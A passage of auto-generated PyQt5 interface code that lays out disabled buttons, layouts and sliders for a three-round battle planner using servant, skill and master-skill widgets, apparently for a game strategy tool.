self.horizontalLayout_19 = QtWidgets.QHBoxLayout()
self.horizontalLayout_19.setObjectName("horizontalLayout_19")
self.round1_master_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_pic.setEnabled(False)
self.round1_master_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_master_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_master_pic.setText("")
self.round1_master_pic.setIconSize(QtCore.QSize(64, 64))
self.round1_master_pic.setObjectName("round1_master_pic")
self.horizontalLayout_19.addWidget(self.round1_master_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_19, 1, 7, 1, 1)
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.round1_servant1_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_skill1.setEnabled(False)
self.round1_servant1_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill1.setText("")
self.round1_servant1_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_servant1_skill1.setObjectName("round1_servant1_skill1")
self.horizontalLayout_11.addWidget(self.round1_servant1_skill1)
self.round1_servant1_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_skill2.setEnabled(False)
self.round1_servant1_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill2.setText("")
self.round1_servant1_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_servant1_skill2.setObjectName("round1_servant1_skill2")
self.horizontalLayout_11.addWidget(self.round1_servant1_skill2)
self.round1_servant1_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_skill3.setEnabled(False)
self.round1_servant1_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant1_skill3.setText("")
self.round1_servant1_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_servant1_skill3.setObjectName("round1_servant1_skill3")
self.horizontalLayout_11.addWidget(self.round1_servant1_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_11, 3, 4, 1, 1)
self.horizontalLayout_17 = QtWidgets.QHBoxLayout()
self.horizontalLayout_17.setObjectName("horizontalLayout_17")
self.round1_servant3_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_pic.setEnabled(False)
self.round1_servant3_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round1_servant3_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round1_servant3_pic.setText("")
self.round1_servant3_pic.setIconSize(QtCore.QSize(64, 70))
self.round1_servant3_pic.setObjectName("round1_servant3_pic")
self.horizontalLayout_17.addWidget(self.round1_servant3_pic)
self.gridLayout_2.addLayout(self.horizontalLayout_17, 1, 6, 1, 1)
self.btn_round1_next = QtWidgets.QPushButton(self.groupBox_3)
self.btn_round1_next.setEnabled(False)
self.btn_round1_next.setMinimumSize(QtCore.QSize(0, 30))
self.btn_round1_next.setMaximumSize(QtCore.QSize(16777215, 30))
self.btn_round1_next.setObjectName("btn_round1_next")
self.gridLayout_2.addWidget(self.btn_round1_next, 3, 8, 1, 1)
self.round1_servant1_np = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant1_np.setEnabled(False)
self.round1_servant1_np.setObjectName("round1_servant1_np")
self.gridLayout_2.addWidget(self.round1_servant1_np, 4, 4, 1, 1)
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.round1_servant3_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_skill1.setEnabled(False)
self.round1_servant3_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill1.setText("")
self.round1_servant3_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_servant3_skill1.setObjectName("round1_servant3_skill1")
self.horizontalLayout_14.addWidget(self.round1_servant3_skill1)
self.round1_servant3_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_skill2.setEnabled(False)
self.round1_servant3_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill2.setText("")
self.round1_servant3_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_servant3_skill2.setObjectName("round1_servant3_skill2")
self.horizontalLayout_14.addWidget(self.round1_servant3_skill2)
self.round1_servant3_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant3_skill3.setEnabled(False)
self.round1_servant3_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant3_skill3.setText("")
self.round1_servant3_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_servant3_skill3.setObjectName("round1_servant3_skill3")
self.horizontalLayout_14.addWidget(self.round1_servant3_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_14, 3, 6, 1, 1)
self.horizontalLayout_18 = QtWidgets.QHBoxLayout()
self.horizontalLayout_18.setObjectName("horizontalLayout_18")
self.round1_master_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_skill1.setEnabled(False)
self.round1_master_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_master_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_master_skill1.setText("")
self.round1_master_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_master_skill1.setObjectName("round1_master_skill1")
self.horizontalLayout_18.addWidget(self.round1_master_skill1)
self.round1_master_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_skill2.setEnabled(False)
self.round1_master_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_master_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_master_skill2.setText("")
self.round1_master_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_master_skill2.setObjectName("round1_master_skill2")
self.horizontalLayout_18.addWidget(self.round1_master_skill2)
self.round1_master_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_master_skill3.setEnabled(False)
self.round1_master_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_master_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_master_skill3.setText("")
self.round1_master_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_master_skill3.setObjectName("round1_master_skill3")
self.horizontalLayout_18.addWidget(self.round1_master_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_18, 3, 7, 1, 1)
self.horizontalLayout_13 = QtWidgets.QHBoxLayout()
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.round1_servant2_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_skill1.setEnabled(False)
self.round1_servant2_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill1.setText("")
self.round1_servant2_skill1.setIconSize(QtCore.QSize(30, 30))
self.round1_servant2_skill1.setObjectName("round1_servant2_skill1")
self.horizontalLayout_13.addWidget(self.round1_servant2_skill1)
self.round1_servant2_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_skill2.setEnabled(False)
self.round1_servant2_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill2.setText("")
self.round1_servant2_skill2.setIconSize(QtCore.QSize(30, 30))
self.round1_servant2_skill2.setObjectName("round1_servant2_skill2")
self.horizontalLayout_13.addWidget(self.round1_servant2_skill2)
self.round1_servant2_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round1_servant2_skill3.setEnabled(False)
self.round1_servant2_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round1_servant2_skill3.setText("")
self.round1_servant2_skill3.setIconSize(QtCore.QSize(30, 30))
self.round1_servant2_skill3.setObjectName("round1_servant2_skill3")
self.horizontalLayout_13.addWidget(self.round1_servant2_skill3)
self.gridLayout_2.addLayout(self.horizontalLayout_13, 3, 5, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_2)
self.gridLayout_4 = QtWidgets.QGridLayout()
self.gridLayout_4.setObjectName("gridLayout_4")
self.round2_servant3_np = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_np.setEnabled(False)
self.round2_servant3_np.setObjectName("round2_servant3_np")
self.gridLayout_4.addWidget(self.round2_servant3_np, 3, 5, 1, 1)
self.horizontalLayout_181 = QtWidgets.QHBoxLayout()
self.horizontalLayout_181.setObjectName("horizontalLayout_181")
self.round2_master_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_skill1.setEnabled(False)
self.round2_master_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_master_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_master_skill1.setText("")
self.round2_master_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_master_skill1.setObjectName("round2_master_skill1")
self.horizontalLayout_181.addWidget(self.round2_master_skill1)
self.round2_master_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_skill2.setEnabled(False)
self.round2_master_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_master_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_master_skill2.setText("")
self.round2_master_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_master_skill2.setObjectName("round2_master_skill2")
self.horizontalLayout_181.addWidget(self.round2_master_skill2)
self.round2_master_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_skill3.setEnabled(False)
self.round2_master_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_master_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_master_skill3.setText("")
self.round2_master_skill3.setIconSize(QtCore.QSize(30, 30))
self.round2_master_skill3.setObjectName("round2_master_skill3")
self.horizontalLayout_181.addWidget(self.round2_master_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_181, 1, 6, 1, 1)
self.round2_servant1_np = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_np.setEnabled(False)
self.round2_servant1_np.setObjectName("round2_servant1_np")
self.gridLayout_4.addWidget(self.round2_servant1_np, 3, 3, 1, 1)
self.horizontalLayout_171 = QtWidgets.QHBoxLayout()
self.horizontalLayout_171.setObjectName("horizontalLayout_171")
self.round2_servant3_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_pic.setEnabled(False)
self.round2_servant3_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_servant3_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_servant3_pic.setText("")
self.round2_servant3_pic.setIconSize(QtCore.QSize(64, 70))
self.round2_servant3_pic.setObjectName("round2_servant3_pic")
self.horizontalLayout_171.addWidget(self.round2_servant3_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_171, 0, 5, 1, 1)
self.horizontalLayout_161 = QtWidgets.QHBoxLayout()
self.horizontalLayout_161.setObjectName("horizontalLayout_161")
self.round2_servant2_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_pic.setEnabled(False)
self.round2_servant2_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_servant2_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_servant2_pic.setText("")
self.round2_servant2_pic.setIconSize(QtCore.QSize(64, 70))
self.round2_servant2_pic.setObjectName("round2_servant2_pic")
self.horizontalLayout_161.addWidget(self.round2_servant2_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_161, 0, 4, 1, 1)
self.horizontalLayout_131 = QtWidgets.QHBoxLayout()
self.horizontalLayout_131.setObjectName("horizontalLayout_131")
self.round2_servant2_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_skill1.setEnabled(False)
self.round2_servant2_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill1.setText("")
self.round2_servant2_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_servant2_skill1.setObjectName("round2_servant2_skill1")
self.horizontalLayout_131.addWidget(self.round2_servant2_skill1)
self.round2_servant2_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_skill2.setEnabled(False)
self.round2_servant2_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill2.setText("")
self.round2_servant2_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_servant2_skill2.setObjectName("round2_servant2_skill2")
self.horizontalLayout_131.addWidget(self.round2_servant2_skill2)
self.round2_servant2_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_skill3.setEnabled(False)
self.round2_servant2_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant2_skill3.setText("")
self.round2_servant2_skill3.setIconSize(QtCore.QSize(30, 30))
self.round2_servant2_skill3.setObjectName("round2_servant2_skill3")
self.horizontalLayout_131.addWidget(self.round2_servant2_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_131, 1, 4, 1, 1)
self.horizontalLayout_141 = QtWidgets.QHBoxLayout()
self.horizontalLayout_141.setObjectName("horizontalLayout_141")
self.round2_servant3_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_skill1.setEnabled(False)
self.round2_servant3_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill1.setText("")
self.round2_servant3_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_servant3_skill1.setObjectName("round2_servant3_skill1")
self.horizontalLayout_141.addWidget(self.round2_servant3_skill1)
self.round2_servant3_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_skill2.setEnabled(False)
self.round2_servant3_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill2.setText("")
self.round2_servant3_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_servant3_skill2.setObjectName("round2_servant3_skill2")
self.horizontalLayout_141.addWidget(self.round2_servant3_skill2)
self.round2_servant3_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant3_skill3.setEnabled(False)
self.round2_servant3_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant3_skill3.setText("")
self.round2_servant3_skill3.setIconSize(QtCore.QSize(30, 30))
self.round2_servant3_skill3.setObjectName("round2_servant3_skill3")
self.horizontalLayout_141.addWidget(self.round2_servant3_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_141, 1, 5, 1, 1)
self.btn_round2_next = QtWidgets.QPushButton(self.groupBox_3)
self.btn_round2_next.setEnabled(False)
self.btn_round2_next.setMinimumSize(QtCore.QSize(0, 30))
self.btn_round2_next.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.btn_round2_next.setObjectName("btn_round2_next")
self.gridLayout_4.addWidget(self.btn_round2_next, 1, 7, 1, 1)
self.horizontalLayout_191 = QtWidgets.QHBoxLayout()
self.horizontalLayout_191.setObjectName("horizontalLayout_191")
self.round2_master_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_master_pic.setEnabled(False)
self.round2_master_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_master_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_master_pic.setText("")
self.round2_master_pic.setIconSize(QtCore.QSize(64, 64))
self.round2_master_pic.setObjectName("round2_master_pic")
self.horizontalLayout_191.addWidget(self.round2_master_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_191, 0, 6, 1, 1)
self.round2_servant2_np = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant2_np.setEnabled(False)
self.round2_servant2_np.setObjectName("round2_servant2_np")
self.gridLayout_4.addWidget(self.round2_servant2_np, 3, 4, 1, 1)
self.horizontalLayout_91 = QtWidgets.QHBoxLayout()
self.horizontalLayout_91.setObjectName("horizontalLayout_91")
self.round2_servant1_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_pic.setEnabled(False)
self.round2_servant1_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round2_servant1_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round2_servant1_pic.setText("")
self.round2_servant1_pic.setIconSize(QtCore.QSize(64, 70))
self.round2_servant1_pic.setObjectName("round2_servant1_pic")
self.horizontalLayout_91.addWidget(self.round2_servant1_pic)
self.gridLayout_4.addLayout(self.horizontalLayout_91, 0, 3, 1, 1)
self.verticalLayout_12 = QtWidgets.QVBoxLayout()
self.verticalLayout_12.setObjectName("verticalLayout_12")
self.round2_label_random = QtWidgets.QLabel(self.groupBox_3)
self.round2_label_random.setEnabled(False)
self.round2_label_random.setObjectName("round2_label_random")
self.verticalLayout_12.addWidget(self.round2_label_random)
self.round2_bar_random = QtWidgets.QSlider(self.groupBox_3)
self.round2_bar_random.setEnabled(False)
self.round2_bar_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round2_bar_random.setMinimum(90)
self.round2_bar_random.setMaximum(110)
self.round2_bar_random.setProperty("value", 90)
self.round2_bar_random.setOrientation(QtCore.Qt.Horizontal)
self.round2_bar_random.setObjectName("round2_bar_random")
self.verticalLayout_12.addWidget(self.round2_bar_random)
self.gridLayout_4.addLayout(self.verticalLayout_12, 0, 7, 1, 1)
self.horizontalLayout_111 = QtWidgets.QHBoxLayout()
self.horizontalLayout_111.setObjectName("horizontalLayout_111")
self.round2_servant1_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_skill1.setEnabled(False)
self.round2_servant1_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill1.setText("")
self.round2_servant1_skill1.setIconSize(QtCore.QSize(30, 30))
self.round2_servant1_skill1.setObjectName("round2_servant1_skill1")
self.horizontalLayout_111.addWidget(self.round2_servant1_skill1)
self.round2_servant1_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_skill2.setEnabled(False)
self.round2_servant1_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill2.setText("")
self.round2_servant1_skill2.setIconSize(QtCore.QSize(30, 30))
self.round2_servant1_skill2.setObjectName("round2_servant1_skill2")
self.horizontalLayout_111.addWidget(self.round2_servant1_skill2)
self.round2_servant1_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round2_servant1_skill3.setEnabled(False)
self.round2_servant1_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round2_servant1_skill3.setText("")
self.round2_servant1_skill3.setIconSize(QtCore.QSize(30, 30))
self.round2_servant1_skill3.setObjectName("round2_servant1_skill3")
self.horizontalLayout_111.addWidget(self.round2_servant1_skill3)
self.gridLayout_4.addLayout(self.horizontalLayout_111, 1, 3, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_4)
self.gridLayout_5 = QtWidgets.QGridLayout()
self.gridLayout_5.setObjectName("gridLayout_5")
self.round3_servant3_np = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_np.setEnabled(False)
self.round3_servant3_np.setObjectName("round3_servant3_np")
self.gridLayout_5.addWidget(self.round3_servant3_np, 3, 6, 1, 1)
self.horizontalLayout_192 = QtWidgets.QHBoxLayout()
self.horizontalLayout_192.setObjectName("horizontalLayout_192")
self.round3_master_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_pic.setEnabled(False)
self.round3_master_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_master_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_master_pic.setText("")
self.round3_master_pic.setIconSize(QtCore.QSize(64, 64))
self.round3_master_pic.setObjectName("round3_master_pic")
self.horizontalLayout_192.addWidget(self.round3_master_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_192, 0, 7, 1, 1)
self.horizontalLayout_92 = QtWidgets.QHBoxLayout()
self.horizontalLayout_92.setObjectName("horizontalLayout_92")
self.round3_servant1_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_pic.setEnabled(False)
self.round3_servant1_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_servant1_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_servant1_pic.setText("")
self.round3_servant1_pic.setIconSize(QtCore.QSize(64, 70))
self.round3_servant1_pic.setObjectName("round3_servant1_pic")
self.horizontalLayout_92.addWidget(self.round3_servant1_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_92, 0, 3, 1, 1)
self.round3_servant1_np = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_np.setEnabled(False)
self.round3_servant1_np.setObjectName("round3_servant1_np")
self.gridLayout_5.addWidget(self.round3_servant1_np, 3, 3, 1, 1)
self.round3_servant2_np = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_np.setEnabled(False)
self.round3_servant2_np.setObjectName("round3_servant2_np")
self.gridLayout_5.addWidget(self.round3_servant2_np, 3, 5, 1, 1)
self.horizontalLayout_172 = QtWidgets.QHBoxLayout()
self.horizontalLayout_172.setObjectName("horizontalLayout_172")
self.round3_servant3_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_pic.setEnabled(False)
self.round3_servant3_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_servant3_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_servant3_pic.setText("")
self.round3_servant3_pic.setIconSize(QtCore.QSize(64, 70))
self.round3_servant3_pic.setObjectName("round3_servant3_pic")
self.horizontalLayout_172.addWidget(self.round3_servant3_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_172, 0, 6, 1, 1)
self.horizontalLayout_162 = QtWidgets.QHBoxLayout()
self.horizontalLayout_162.setObjectName("horizontalLayout_162")
self.round3_servant2_pic = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_pic.setEnabled(False)
self.round3_servant2_pic.setMinimumSize(QtCore.QSize(64, 70))
self.round3_servant2_pic.setMaximumSize(QtCore.QSize(64, 70))
self.round3_servant2_pic.setText("")
self.round3_servant2_pic.setIconSize(QtCore.QSize(64, 70))
self.round3_servant2_pic.setObjectName("round3_servant2_pic")
self.horizontalLayout_162.addWidget(self.round3_servant2_pic)
self.gridLayout_5.addLayout(self.horizontalLayout_162, 0, 5, 1, 1)
self.btn_output_strategy = QtWidgets.QPushButton(self.groupBox_3)
self.btn_output_strategy.setEnabled(False)
self.btn_output_strategy.setObjectName("btn_output_strategy")
self.gridLayout_5.addWidget(self.btn_output_strategy, 2, 9, 1, 1)
self.horizontalLayout_132 = QtWidgets.QHBoxLayout()
self.horizontalLayout_132.setObjectName("horizontalLayout_132")
self.round3_servant2_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_skill1.setEnabled(False)
self.round3_servant2_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill1.setText("")
self.round3_servant2_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_servant2_skill1.setObjectName("round3_servant2_skill1")
self.horizontalLayout_132.addWidget(self.round3_servant2_skill1)
self.round3_servant2_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_skill2.setEnabled(False)
self.round3_servant2_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill2.setText("")
self.round3_servant2_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_servant2_skill2.setObjectName("round3_servant2_skill2")
self.horizontalLayout_132.addWidget(self.round3_servant2_skill2)
self.round3_servant2_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant2_skill3.setEnabled(False)
self.round3_servant2_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant2_skill3.setText("")
self.round3_servant2_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_servant2_skill3.setObjectName("round3_servant2_skill3")
self.horizontalLayout_132.addWidget(self.round3_servant2_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_132, 2, 5, 1, 1)
self.verticalLayout_13 = QtWidgets.QVBoxLayout()
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.round3_label_random = QtWidgets.QLabel(self.groupBox_3)
self.round3_label_random.setEnabled(False)
self.round3_label_random.setObjectName("round3_label_random")
self.verticalLayout_13.addWidget(self.round3_label_random)
self.round3_bar_random = QtWidgets.QSlider(self.groupBox_3)
self.round3_bar_random.setEnabled(False)
self.round3_bar_random.setMaximumSize(QtCore.QSize(100, 16777215))
self.round3_bar_random.setMinimum(90)
self.round3_bar_random.setMaximum(110)
self.round3_bar_random.setProperty("value", 90)
self.round3_bar_random.setOrientation(QtCore.Qt.Horizontal)
self.round3_bar_random.setObjectName("round3_bar_random")
self.verticalLayout_13.addWidget(self.round3_bar_random)
self.gridLayout_5.addLayout(self.verticalLayout_13, 0, 9, 1, 1)
self.horizontalLayout_182 = QtWidgets.QHBoxLayout()
self.horizontalLayout_182.setObjectName("horizontalLayout_182")
self.round3_master_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_skill1.setEnabled(False)
self.round3_master_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_master_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_master_skill1.setText("")
self.round3_master_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_master_skill1.setObjectName("round3_master_skill1")
self.horizontalLayout_182.addWidget(self.round3_master_skill1)
self.round3_master_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_skill2.setEnabled(False)
self.round3_master_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_master_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_master_skill2.setText("")
self.round3_master_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_master_skill2.setObjectName("round3_master_skill2")
self.horizontalLayout_182.addWidget(self.round3_master_skill2)
self.round3_master_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_master_skill3.setEnabled(False)
self.round3_master_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_master_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_master_skill3.setText("")
self.round3_master_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_master_skill3.setObjectName("round3_master_skill3")
self.horizontalLayout_182.addWidget(self.round3_master_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_182, 2, 7, 1, 1)
self.horizontalLayout_142 = QtWidgets.QHBoxLayout()
self.horizontalLayout_142.setObjectName("horizontalLayout_142")
self.round3_servant3_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_skill1.setEnabled(False)
self.round3_servant3_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill1.setText("")
self.round3_servant3_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_servant3_skill1.setObjectName("round3_servant3_skill1")
self.horizontalLayout_142.addWidget(self.round3_servant3_skill1)
self.round3_servant3_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_skill2.setEnabled(False)
self.round3_servant3_skill2.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill2.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill2.setText("")
self.round3_servant3_skill2.setIconSize(QtCore.QSize(30, 30))
self.round3_servant3_skill2.setObjectName("round3_servant3_skill2")
self.horizontalLayout_142.addWidget(self.round3_servant3_skill2)
self.round3_servant3_skill3 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant3_skill3.setEnabled(False)
self.round3_servant3_skill3.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill3.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant3_skill3.setText("")
self.round3_servant3_skill3.setIconSize(QtCore.QSize(30, 30))
self.round3_servant3_skill3.setObjectName("round3_servant3_skill3")
self.horizontalLayout_142.addWidget(self.round3_servant3_skill3)
self.gridLayout_5.addLayout(self.horizontalLayout_142, 2, 6, 1, 1)
self.horizontalLayout_112 = QtWidgets.QHBoxLayout()
self.horizontalLayout_112.setObjectName("horizontalLayout_112")
self.round3_servant1_skill1 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_skill1.setEnabled(False)
self.round3_servant1_skill1.setMinimumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill1.setMaximumSize(QtCore.QSize(30, 30))
self.round3_servant1_skill1.setText("")
self.round3_servant1_skill1.setIconSize(QtCore.QSize(30, 30))
self.round3_servant1_skill1.setObjectName("round3_servant1_skill1")
self.horizontalLayout_112.addWidget(self.round3_servant1_skill1)
self.round3_servant1_skill2 = QtWidgets.QPushButton(self.groupBox_3)
self.round3_servant1_skill2.setEnabled(False)
